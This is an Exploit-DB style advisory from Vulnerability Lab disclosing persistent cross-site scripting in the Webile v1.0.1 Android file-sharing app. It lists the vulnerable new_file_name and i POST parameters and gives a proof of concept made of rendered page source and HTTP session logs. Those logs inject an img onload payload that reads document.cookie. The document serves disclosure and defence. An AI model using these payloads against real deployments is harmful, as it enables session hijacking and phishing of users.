
10 changes to exploits/shellcodes/ghdb Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. RWS WorldServer 11.7.3 - Session Token Enumeration Aures Booking & POS Terminal - Local Privilege Escalation Boom CMS v8.0.7 - Cross Site Scripting PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities pfSense v2.7.0 - OS Command Injection Webile v1.0.1 - Multiple Cross Site Scripting Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
240 lines
No EOL
8.7 KiB
Text
240 lines
No EOL
8.7 KiB
Text
Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
https://www.vulnerability-lab.com/get_content.php?id=2321
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2023-07-03
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
2321
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
5.5
|
|
|
|
|
|
Vulnerability Class:
|
|
====================
|
|
Cross Site Scripting - Persistent
|
|
|
|
|
|
Current Estimated Price:
|
|
========================
|
|
500€ - 1.000€
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in
|
|
the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,
|
|
statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other
|
|
functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,
|
|
Windows, Linux, iOS, Android and other multi-platform operating systems.
|
|
|
|
(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Product Owner: Webile
|
|
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2022-10-11: Researcher Notification & Coordination (Security Researcher)
|
|
2022-10-12: Vendor Notification (Security Department)
|
|
2022-**-**: Vendor Response/Feedback (Security Department)
|
|
2022-**-**: Vendor Fix/Patch (Service Developer Team)
|
|
2022-**-**: Security Acknowledgements (Security Department)
|
|
2023-07-03: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
Medium
|
|
|
|
|
|
Authentication Type:
|
|
====================
|
|
Restricted Authentication (Guest Privileges)
|
|
|
|
|
|
User Interaction:
|
|
=================
|
|
Low User Interaction
|
|
|
|
|
|
Disclosure Type:
|
|
================
|
|
Independent Security Research
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.
|
|
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
|
|
web-application requests from the application-side.
|
|
|
|
The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious
|
|
script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.
|
|
|
|
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious
|
|
source and persistent manipulation of affected application modules.
|
|
|
|
Request Method(s):
|
|
[+] POST
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] new_file_name
|
|
[+] i
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
|
|
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
|
|
|
|
|
|
Vulnerable Source: Send
|
|
Send message to phone listing
|
|
<div class="layui-colla-item">
|
|
<div class="layui-card-header">Message</div>
|
|
<div class="layui-colla-content" style="display:block;padding-left:16px;">
|
|
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"
|
|
title="Copy" onclick="copy(1658081411827)"><i class="iconfont"> </i></a><br>
|
|
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
|
|
</div></div></div>
|
|
history logs messages
|
|
<table class="layui-table layui-form">
|
|
<thead><tr>
|
|
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
|
|
<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
|
|
<th style="border-right-width:1px;">Message</th>
|
|
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
|
|
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
|
|
</thead>
|
|
<tbody><tr>
|
|
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
|
|
<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
|
|
</td>
|
|
<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
|
|
<td align="center">2022/07/17 20:10</td>
|
|
<td class="td-manage" style="border-right-width:1px;text-align:center;">
|
|
<a title="Copy" onclick="copy(3)" href="javascript:;">
|
|
<i class="iconfont"> </i>
|
|
</a>
|
|
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
|
|
<i class="layui-icon"> </i>
|
|
</a></td></tr></tbody></table>
|
|
|
|
|
|
|
|
--- PoC Session Logs #1 (POST) --- (Add)
|
|
http://localhost:8080/file_action
|
|
Host: localhost:8080
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Length: 210
|
|
Origin:http://localhost:8080
|
|
Connection: keep-alive
|
|
Referer:http://localhost:8080/webile_files
|
|
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
|
|
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
|
|
-
|
|
POST: HTTP/1.1 200 OK
|
|
Content-Type: application/json
|
|
Connection: keep-alive
|
|
Content-Encoding: gzip
|
|
Transfer-Encoding: chunked
|
|
-
|
|
http://localhost:8080/evil.source
|
|
Host: localhost:8080
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: keep-alive
|
|
Referer:http://localhost:8080/webile_files
|
|
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
|
|
Upgrade-Insecure-Requests: 1
|
|
-
|
|
GET: HTTP/1.1 200 OK
|
|
Content-Type: application/octet-stream
|
|
Connection: keep-alive
|
|
Content-Length: 0
|
|
-
|
|
Cookie:
|
|
treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
|
|
|
|
|
|
|
|
--- PoC Session Logs #2 (POST) --- (Send)
|
|
http://localhost:8080/send
|
|
Host: localhost:8080
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Length: 180
|
|
Origin:http://localhost:8080
|
|
Connection: keep-alive
|
|
Referer:http://localhost:8080/webile_send
|
|
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
|
|
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
|
|
-
|
|
POST: HTTP/1.1 200 OK
|
|
Content-Type: application/json
|
|
Connection: keep-alive
|
|
Content-Encoding: gzip
|
|
Transfer-Encoding: chunked
|
|
-
|
|
http://localhost:8080/evil.source
|
|
Host: localhost:8080
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: keep-alive
|
|
Referer:http://localhost:8080/webile_send
|
|
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
|
|
Upgrade-Insecure-Requests: 1
|
|
-
|
|
GET: HTTP/1.1 200 OK
|
|
Content-Type: application/octet-stream
|
|
Date: Sun, 17 Jul 2022 18:08:33 GMT
|
|
Connection: keep-alive
|
|
Content-Length: 0
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium. |